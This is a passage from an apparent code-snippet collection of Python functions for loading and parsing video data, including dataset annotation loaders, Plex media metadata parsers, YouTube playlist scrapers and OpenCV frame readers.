self.cfg.MODEL.USE_TRAJECTORIES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading trajectories...')\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.trajectories_path), 'r') as f:\n self._trajectories = json.load(f)\n\n # Load human pose features (theta; 72 points)\n if self.cfg.MODEL.USE_HUMAN_POSES:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses...')\n import pickle\n with open(os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path), 'rb') as f:\n self._human_poses = pickle.load(f)\n elif self.cfg.MODEL.USE_SPA_CONF:\n if cfg.VIDOR.TEST_DEBUG:\n print('Loading human poses for spatial configuration module...')\n self._human_poses_root = os.path.join(cfg.VIDOR.ANNOTATION_DIR, self.human_poses_path)\n\n # Loading frame paths.\n (\n self._image_paths,\n self._video_idx_to_name,\n ) = vidor_helper.load_image_lists(cfg, is_train=(self._split == \"train\"))\n\n # Loading annotations for boxes and labels.\n self._instances = vidor_helper.load_boxes_and_labels(\n cfg, mode=self._split\n )\n\n # Get indices of keyframes and corresponding boxes and labels.\n (\n self._keyframe_indices,\n self._keyframe_boxes_and_labels,\n ) = vidor_helper.get_keyframe_data(cfg, self._instances, mode=self._split)\n\n # import pdb; pdb.set_trace()\n\n # Calculate the number of used boxes.\n self._num_boxes_used = vidor_helper.get_num_boxes_used(\n self._keyframe_indices, self._keyframe_boxes_and_labels\n )\n\n self.print_summary()\n\n def debug(idx):\n pass\n\n if cfg.VIDOR.TEST_DEBUG:\n debug(0)\n # pass", "def load_video_data(fpath):\n videos = []\n with open(fpath) as f:\n d1 = json.load(f)['items']\n videos += append_videos(d1)\n return videos", "def save_video_data(self):\n if self.overwrite:\n # Erase old event videos\n for path in self.video_dir.glob('*.json'):\n path.unlink()\n for video in self.videos:\n video.save()", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexHistory._loadData(self, data)", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._data = data\n self.addedAt = utils.toDatetime(data.attrib.get('addedAt'))\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.extraType = utils.cast(int, data.attrib.get('extraType'))\n self.index = utils.cast(int, data.attrib.get('index'))\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(\n data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.skipDetails = utils.cast(int, data.attrib.get('skipDetails'))\n self.subtype = data.attrib.get('subtype')\n self.thumbAspectRatio = data.attrib.get('thumbAspectRatio')\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.year = utils.cast(int, data.attrib.get('year'))", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def load(self) -> None:\n self._load_data()\n self._load_poses()\n self._load_timestamps()", "def loadData(catalog):\n loadVideos(catalog)\n loadCategories(catalog)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.countries = self.findItems(data, media.Country)\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.editionTitle = data.attrib.get('editionTitle')\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.primaryExtraKey = data.attrib.get('primaryExtraKey')\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratingImage = data.attrib.get('ratingImage')\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def merge_video_data(self):\n if self.overwrite:\n if self.wipe:\n self.videos = self.youtube_videos\n elif self.add_new_files or self.overwrite_fields:\n old_videos = {\n video.filename: video\n for video in self.file_videos\n }\n old_videos_url = {\n video.metadata['videos'][0]['url']: video\n for video in self.file_videos\n }\n new_videos = {}\n for video in self.youtube_videos:\n new_video_url = video.metadata['videos'][0]['url']\n if new_video_url in old_videos_url:\n new_video_filename = old_videos_url[new_video_url].filename\n else:\n new_video_filename = video.filename\n new_videos[new_video_filename] = video\n\n if self.overwrite_fields:\n forgotten = set(old_videos) - set(new_videos)\n for name in forgotten:\n logger.warning('Missing video: {} {}',\n old_videos[name].filename,\n old_videos[name].metadata['videos'][0]['url'],\n )\n\n changes = set(new_videos).intersection(set(old_videos))\n for path in changes:\n merged_video = old_videos[path].merge(\n new_videos[path], self.overwrite_fields)\n self.videos.append(merged_video)\n else:\n self.videos = self.file_videos\n if self.add_new_files:\n adds = set(new_videos) - set(old_videos)\n self.videos.extend([new_videos[path] for path in adds])\n else: # not self.overwrite\n self.videos = self.youtube_videos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.autoDeletionItemPolicyUnwatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyUnwatchedLibrary', '0'))\n self.autoDeletionItemPolicyWatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyWatchedLibrary', '0'))\n self.childCount = utils.cast(int, data.attrib.get('childCount'))\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.episodeSort = utils.cast(int, data.attrib.get('episodeSort', '-1'))\n self.flattenSeasons = utils.cast(int, data.attrib.get('flattenSeasons', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.locations = self.listAttrs(data, 'path', etag='Location')\n self.network = data.attrib.get('network')\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.seasonCount = utils.cast(int, data.attrib.get('seasonCount', self.childCount))\n self.showOrdering = data.attrib.get('showOrdering')\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def videos(self, videos):\n self._videos = videos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._seasonNumber = None # cached season number\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.grandparentArt = data.attrib.get('grandparentArt')\n self.grandparentGuid = data.attrib.get('grandparentGuid')\n self.grandparentKey = data.attrib.get('grandparentKey')\n self.grandparentRatingKey = utils.cast(int, data.attrib.get('grandparentRatingKey'))\n self.grandparentTheme = data.attrib.get('grandparentTheme')\n self.grandparentThumb = data.attrib.get('grandparentThumb')\n self.grandparentTitle = data.attrib.get('grandparentTitle')\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.labels = self.findItems(data, media.Label)\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.parentYear = utils.cast(int, data.attrib.get('parentYear'))\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.skipParent = utils.cast(bool, data.attrib.get('skipParent', '0'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))\n\n # If seasons are hidden, parentKey and parentRatingKey are missing from the XML response.\n # https://forums.plex.tv/t/parentratingkey-not-in-episode-xml-when-seasons-are-hidden/300553\n if self.skipParent and data.attrib.get('parentRatingKey') is None:\n # Parse the parentRatingKey from the parentThumb\n if self.parentThumb and self.parentThumb.startswith('/library/metadata/'):\n self.parentRatingKey = utils.cast(int, self.parentThumb.split('/')[3])\n # Get the parentRatingKey from the season's ratingKey\n if not self.parentRatingKey and self.grandparentRatingKey:\n self.parentRatingKey = self.show().season(season=self.parentIndex).ratingKey\n if self.parentRatingKey:\n self.parentKey = f'/library/metadata/{self.parentRatingKey}'", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n data = hload_pkl(self.ann_file)\n\n video_infos = []\n for video_info in data:\n filename = video_info['filename']\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_info['filename'] = filename\n label = video_info['label']\n if self.multi_class and isinstance(label, np.ndarray):\n video_info['label'] = label.astype(np.float32)\n\n video_infos.append(video_info)\n\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.collections = self.findItems(data, media.Collection)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentStudio = data.attrib.get('parentStudio')\n self.parentTheme = data.attrib.get('parentTheme')\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.ratings = self.findItems(data, media.Rating)\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_poses(self):\n print('Loading poses for sequence ' + self.sequence + '...')\n\n pose_file = os.path.join(self.pose_path, self.sequence + '.txt')\n\n # Read and parse the poses\n try:\n self.T_w_cam0 = []\n with open(pose_file, 'r') as f:\n for line in f.readlines():\n T = np.fromstring(line, dtype=float, sep=' ')\n T = T.reshape(3, 4)\n T = np.vstack((T, [0, 0, 0, 1]))\n self.T_w_cam0.append(T)\n print('done.')\n\n except FileNotFoundError:\n print('Ground truth poses are not avaialble for sequence ' +\n self.sequence + '.')", "def loadData(catalog, size):\n loadCategories(catalog)\n loadVideos(catalog, size)", "def load(self):\n if self.content_provider:\n self.content_provider.load()\n self.items = self.content_provider.movies", "def get_session_videodata(videos):\n # Get first frame of first video for future processing and number of frames in each video\n videos_data = {'Frame rate': [], 'Number frames': []}\n for idx, videofile in enumerate(videos):\n cap = cv2.VideoCapture(videofile)\n videos_data['Frame rate'].append(cap.get(cv2.CAP_PROP_FPS))\n videos_data['Number frames'].append(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)))\n videos_data['Cumu. Num Frames'] = np.cumsum(videos_data['Number frames'])\n return videos_data", "def videos(self) -> List[AbstractVideoLoader]:\n return self._videos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def load_data():\n # use the load_snippet_pths_test in data writer to get frames and labels\n print('Loading frames and labels...')\n dataset_writer = dataset_factory.get_writer(FLAGS.datasetname)\n writer = dataset_writer()\n\n # retrieve list of test videos\n vid_lst = writer.generate_data_lst_from_split(FLAGS.split_fn)\n if _DEBUG_:\n vid_lst = vid_lst[:3]\n\n # for each video, collect fnames and labels with downsampling\n frames, labels = [], []\n print('Found {:d} videos'.format(len(vid_lst)))\n for vid in vid_lst:\n print(' Loading {}...'.format(vid))\n fname_pths_per_vid, labels_per_vid = writer.load_snippet_pths_test(\n FLAGS.datadir, [vid], FLAGS.labels_fname, FLAGS.bg_lbl,\n FLAGS.ext, FLAGS.frameskip)\n fname_pths_per_vid = [x[0] for x in fname_pths_per_vid]\n\n if _DEBUG_:\n fname_pths_per_vid = fname_pths_per_vid[:200]\n labels_per_vid = labels_per_vid[:200]\n\n frames.append(_load_images(fname_pths_per_vid))\n labels.append(np.array(labels_per_vid))\n return frames, labels", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def onclick_load_video(self):\n video_source = select_file(\n \"Select Video Files\",\n \"../\",\n \"Video Files (*.mp4 *.avi *.mpg *.gif *.mov)\")\n if video_source:\n param_name = select_file(\n \"Select Parameter\", \"../\", \"Parameter Files (*.json)\")\n if param_name:\n self.moildev = Moildev(param_name)\n self.running_video(video_source)", "def load_video(self):\r\n if self.file_name=='':\r\n Tk().withdraw()\r\n self.file_name = askopenfilename()\r\n cap = cv2.VideoCapture(self.file_name)\r\n self.length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n self.heigth = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.fps = int(round(cap.get(cv2.CAP_PROP_FPS)))\r\n \r\n video_buffer = []#np.ndarray(shape=(self.length, self.heigth, self.width, 3), dtype=np.uint8)\r\n for i in tqdm(range(self.length), desc='Loading video from: {}'.format(self.file_name)):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n video_buffer.append(frame)\r\n #assert(i==self.length-1)\r\n video_buffer = np.array(video_buffer, dtype=np.uint8)\r\n self.video_buffer = video_buffer\r\n cap.release()\r\n self.ix = self.width-1\r\n self.iy = self.heigth-1 \r\n self.roi = dict(x1=self.x, y1=self.y, x2=self.ix, y2=self.iy)\r\n return video_buffer", "def LOSO(self, epochs, debug=False):\n\n indices = [i for i in range(0, len(self.dataset))]\n\n if debug:\n print(f\"{len(indices)} number of videos before purge\")\n\n indices = self.filter_bad_indices(indices, debug=debug)\n\n if debug:\n print(f\"{len(indices)} remain after purge\")\n\n results = [[\"filename\", \"MIMIC\", \"INF\"]]\n old_dir = self.save_dir\n\n # Cycle through videos, performing LOSO\n for i in range(0, len(indices)):\n self.save_dir = old_dir + f\"LOSO_{self.dataset[indices[i]]['filename'][:-4]}_{self.segment}/\"\n\n if debug:\n print(f\"Working on model LOSO_model_{self.dataset[indices[i]]['filename'][:-4]}_{self.segment}\")\n\n self.net = model.Classifier(self.frame_seg, dropout=0.35, device=self.device)\n self.net = self.net.to(self.device)\n self.optim = optim.Adam(self.net.parameters(), lr=0.001, weight_decay=0.0001)\n indices_copy = indices.copy()\n self.train(epochs, train=indices_copy[:i] + indices_copy[i+1:], val=[indices[i]], debug=debug)\n\n results.append(self.test([indices[i]], debug)[0])\n\n utils.write_to_csv(old_dir + f\"LOSO_{self.segment}_RESULTS.csv\", results)", "def load_data(self):", "def load_velo(self):\n # Find all the Velodyne files\n velo_path = os.path.join(self.sequence_path, 'velodyne', '*.bin')\n velo_files = sorted(glob.glob(velo_path))\n\n # Subselect the chosen range of frames, if any\n if self.frame_range:\n velo_files = [velo_files[i] for i in self.frame_range]\n\n print('Found ' + str(len(velo_files)) + ' Velodyne scans...')\n\n # Read the Velodyne scans. Each point is [x,y,z,reflectance]\n self.velo = utils.load_velo_scans(velo_files)\n\n print('done.')", "def load_data(self) -> None:", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def __loadVideo(self):\n # Check if movie file exists ...\n #\n if not(os.path.isfile(self.fNameVideo)):\n return stm.StimErrC.videoFileNotFound\n\n try: \n # Load video\n #\n self.video = mpe.VideoFileClip(self.fNameVideo)\n \n except IOError: \n return stm.StimErrC.invalidVideoFormat\n \n # Retrieve video description\n #\n self.dxFr = self.video.size[0]\n self.dyFr = self.video.size[1]\n self.nFr = self.video.duration *self.video.fps\n self.fps = self.video.fps\n ssp.Log.write(\"DEBUG\", \"stim_video: {0}x{1} pixel, {2} frames, {3} fps\"\n .format(self.dxFr, self.dyFr, self.nFr, self.fps))\n \n if self.isTestOnly:\n # Return here if the video was only loaded to test if it is ok\n #\n self.video = None\n return stm.StimErrC.ok\n \n # Load movie frames (note that frames is a generator!)\n #\n self.frames = self.video.iter_frames() \n self.isReady = True\n return stm.StimErrC.ok", "def load_all(self):\n if os.path.isfile(self.vocab_path):\n self.vocab_processor = self.load_vocab()\n else:\n self.vocab_processor = self.train_vocab()\n if self.data_path:\n self.x, self.y = self.load_data(self.need_shuffle)\n print(\"Max document length: {}\".format(self.max_doc))", "def test_plenty_of_video_files():\n # make sure that there is one sequence per video file\n pipe = VideoPipe(\n batch_size=BATCH_SIZE, data=PLENTY_VIDEO_FILES, step=1000000, sequence_length=1)\n pipe.build()\n iters = math.ceil(len(os.listdir(PLENTY_VIDEO_DIRECTORY)) / BATCH_SIZE)\n for i in range(iters):\n print(\"Iter \" + str(i))\n pipe.run()", "def videos(self):\n return self._videos", "def load_video(self):\n self.video_file = tkFileDialog.askopenfilename()\n self.video_parser = VideoFileParser(self.video_file)\n\n self.video_entries = self.video_parser.entries\n\n for index, entry in enumerate(self.video_entries):\n self.video_box.insert(index, entry.word)", "def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_data(path='./data/train'):\n print(\"Loading IMDB Data...\")\n data = []\n\n dir = os.path.dirname(__file__)\n file_list = glob.glob(os.path.join(dir, path + '/pos/*'))\n file_list.extend(glob.glob(os.path.join(dir, path + '/neg/*')))\n print(\"Parsing %s files\" % len(file_list))\n for i, f in enumerate(file_list):\n with open(f, \"r\", encoding=\"utf8\") as openf:\n s = openf.read()\n data.append(imp.preprocess(s)) # NOTE: Preprocessing code called here on all reviews\n return data", "def get_all_videos(self):\n\n return list(self._videos.values())", "def load_expdict(params, e, expdict, _DEFAULT_VIDDIR):\n _DEFAULT_NPY_DIR = 'npy_volumes'\n exp = params.copy()\n exp = make_paths_safe(exp)\n exp[\"label3d_file\"] = expdict[\"label3d_file\"]\n exp[\"base_exp_folder\"] = os.path.dirname(exp[\"label3d_file\"])\n\n if \"viddir\" not in expdict:\n # if the videos are not at the _DEFAULT_VIDDIR, then it must\n # be specified in the io.yaml experiment portion\n exp[\"viddir\"] = os.path.join(exp[\"base_exp_folder\"], _DEFAULT_VIDDIR)\n else:\n exp[\"viddir\"] = expdict[\"viddir\"]\n print(\"Experiment {} using videos in {}\".format(e, exp[\"viddir\"]))\n\n l3d_camnames = io.load_camnames(expdict[\"label3d_file\"])\n if \"camnames\" in expdict:\n exp[\"camnames\"] = expdict[\"camnames\"]\n elif l3d_camnames is not None:\n exp[\"camnames\"] = l3d_camnames\n print(\"Experiment {} using camnames: {}\".format(e, exp[\"camnames\"]))\n\n # Use the camnames to find the chunks for each video\n chunks = {}\n for name in exp[\"camnames\"]:\n if exp[\"vid_dir_flag\"]:\n camdir = os.path.join(exp[\"viddir\"], name)\n else:\n camdir = os.path.join(exp[\"viddir\"], name)\n intermediate_folder = os.listdir(camdir)\n camdir = os.path.join(camdir, intermediate_folder[0])\n video_files = os.listdir(camdir)\n video_files = [f for f in video_files if \".mp4\" in f]\n video_files = sorted(video_files, key=lambda x: int(x.split(\".\")[0]))\n chunks[str(e) + \"_\" + name] = np.sort(\n [int(x.split(\".\")[0]) for x in video_files]\n )\n exp[\"chunks\"] = chunks\n print(chunks)\n\n # For npy volume training\n if params[\"use_npy\"]:\n exp[\"npy_vol_dir\"] = os.path.join(exp[\"base_exp_folder\"], _DEFAULT_NPY_DIR)\n return exp", "def refresh(self):\r\n # todo, use vid_info as property instead of this\r\n # reset properties and rebuild streams\r\n self.setup()", "def load_demos():\n for index in range(len(feconf.DEMO_EXPLORATIONS)):\n load_demo(str(index))", "def load_movies():\n filepath = \"./seed_data/u.item\"\n movies = open(filepath)\n\n for movie in movies:\n movie = movie.rstrip().split('|')\n title = movie[1][:-7]\n title = title.decode(\"latin-1\")\n if movie[2]:\n date = datetime.strptime(movie[2], '%d-%b-%Y')\n else:\n date = None\n db_movie = Movie(\n movie_id = movie[0], title = title, \n released_at = date, imdb_url = movie[4])\n db.session.add(db_movie)\n\n db.session.commit()", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexHistory._loadData(self, data)", "def get_movie_data(files: list) -> list:\n pass", "def precompute_numpy_video_files(self):\n videos = self.get_videos(self.not_collisions, 1) \\\n | chain_with(self.get_videos(self.collisions, 0)) \\\n | where(lambda f: not isfile(self.get_numpy_filename(f[1])))\n\n for v in videos:\n path = self.get_numpy_filename(v[1])\n\n video_to_npy(v[1],\n # note weird thing here, width doesn't work they appear to be inverted\n height=self.video_size,\n squarecrop=self.squarecrop,\n fps=self.framerate,\n maxlength=self.max_length,\n # save a npy replacement\n outfile=path)\n\n print('%s written' % (path))", "def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def _parse_list(self):\n frame_path = [x.strip().split(' ') for x in open(self._image_set)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))", "def _parse_list(self):\n frame_path = [x.strip().split(' ') for x in open(self._image_set)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))", "def videos(self):\r\n return v3.Videos(self)", "def load_stream_data(test_path, test_file=0):\n left_video_file = os.path.join(test_path + '/left_{:02d}.avi'.format(test_file))\n right_video_file = os.path.join(test_path + '/right_{:02d}.avi'.format(test_file))\n left_annotations_dir = os.path.join(test_path + '/left_{:02d}_json/*'.format(test_file))\n right_annotations_dir = os.path.join(test_path + '/right_{:02d}_json/*'.format(test_file))\n\n left_annotations = sorted(glob(left_annotations_dir))\n right_annotations = sorted(glob(right_annotations_dir))\n\n return left_video_file, right_video_file, left_annotations, right_annotations", "def init_video(self):\n\n assert self.container is None\n\n retry = 3\n while self.container is None and 0 < retry:\n retry -= 1\n try:\n self.container = av.open(self.tello.get_video_stream())\n except av.AVError as ave:\n print(ave)\n print('retry...')\n\n\n assert self.container is not None", "def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', 